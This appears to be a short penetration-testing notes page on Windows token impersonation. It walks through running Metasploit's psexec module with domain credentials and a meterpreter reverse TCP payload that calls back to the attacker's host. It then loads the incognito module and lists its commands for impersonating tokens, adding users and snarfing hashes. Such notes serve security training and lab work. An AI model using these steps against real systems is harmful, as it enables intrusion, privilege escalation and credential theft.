Token Impersonation

Load msfconsole and then search for psexec.

use 4 (exploit/windows/smb/psexec) and set all the options (rhosts, smbdomain, smbuser, smbpassword, lhost to eth0 and set the targets to 2 (Native upload), set the payload to windows/x64/meterpreter/reverse_tcp)

After getting a session, load incognito (you can type load and then double-TAB to see all the options)

Incognito Commands

==================

Command Description

------------------------------ ----------------------------------------------------

add_group_user Attempt to add a user to a global group with all tokens

add_localgroup_user Attempt to add a user to a local group with all tokens

add_user Attempt to add a user with all tokens

impersonate_token Impersonate specified token

list_tokens List tokens available under current user context

snarf_hashes Snarf challenge/response hashes for every token

PreviousPost Compromise Attacks NextPowerUp

Last updated 1 year ago